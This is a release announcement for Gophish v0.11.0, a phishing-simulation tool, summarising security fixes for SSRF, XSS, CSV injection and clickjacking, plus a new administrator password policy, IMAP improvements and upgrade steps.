Gophish: Gophish v0.11.0

Gophish just got better.

We’re excited to announce the release of Gophish v0.11.0. This release includes important security fixes, adds some minor features, and fixes some bugs.

Security Fixes

This release addresses multiple security issues that were identified and reported by the community. As always, we encourage sending in security reports via our security policy, and are appreciative of all the work that went in to finding and reporting these vulnerabilities.

The following vulnerabilities were fixed in this latest release:

Server-side Request Forgery (SSRF)

Reported by: Marcus Nilsson of usd AG
Reported by: @dunderhay in #1908

An authenticated user could use certain features of Gophish to make inbound connections to the local network. The most critical of these is via the Landing Page import feature, which could be used to make arbitrary upstream web requests.

Since importing local webpages, or otherwise making local network connections (e.g. for SMTP/IMAP servers, webhook URLs, etc.) is an expected use case for Gophish we’ve decided to implement an opt-in allowlist. By default, we block access only to known IP addresses commonly associated with cloud metadata services, but it is now possible to explicitly set the allowed_internal_hosts configuration variable in the admin_server section of config.json to a list of allowed internal addresses.

More information can be found here.

Cross-Site Scripting (XSS)

Reported By: Marcus Nilsson of usd AG
Reported By: @dunderhay in #1901

Various cross-site scripting issues were identified and fixed. All issues required authenticated access and only affected either the user that created the objects, or an administrator using our “Impersonate” issue to impersonate the user that created the objects.

More information can be found in 4e9b94b and 19ef924.

CSV Injection

Reported By: Marcus Nilsson of usd AG

Malicious data could be submitted during a campaign that, when exported as a CSV and opened in a spreadsheet viewer, is interpreted as a formula leading to command execution.

More information on CSV Injection can be found here. More information about the fix can be found in b25f5ac.

Clickjacking

Reported By: Marcus Nilsson of usd AG

An attacker could create an iframe which tricks an authenticated administrator into unexpectedly clicking the “Reset” button in the settings page, causing their API key to be reset, potentially causing a denial of service condition.

More information about the fix can be found in 6df62e8.

Adding a Password Policy

This release adds a basic password policy for administrators, and removes the default password “gophish”. Instead, an initial password is randomly generated and printed in the terminal when Gophish is launched for the first time.

It is possible to override the initial password and API key with environment variables if needed.

More Robust IMAP Support

This release adds the ability to mark emails as reported that were sent as an attachment. Additionally, it changes the underlying IMAP library to be more robust, eliminating some possible bugs.

Credit to @glennzw for the changes!

Changelog

You can find the full changelog for this release here.

How to Upgrade

To upgrade, download the release for your platform, extract into a folder, and copy (remember to copy, not move so that you have a backup) your existing gophish.db file into the new directory. Then, run the new Gophish binary and you’ll be good to go!

Now, one more thing:

We want to hear from you!

Have questions, comments, or feature ideas about Gophish? Let us know by filing an issue.

Enjoy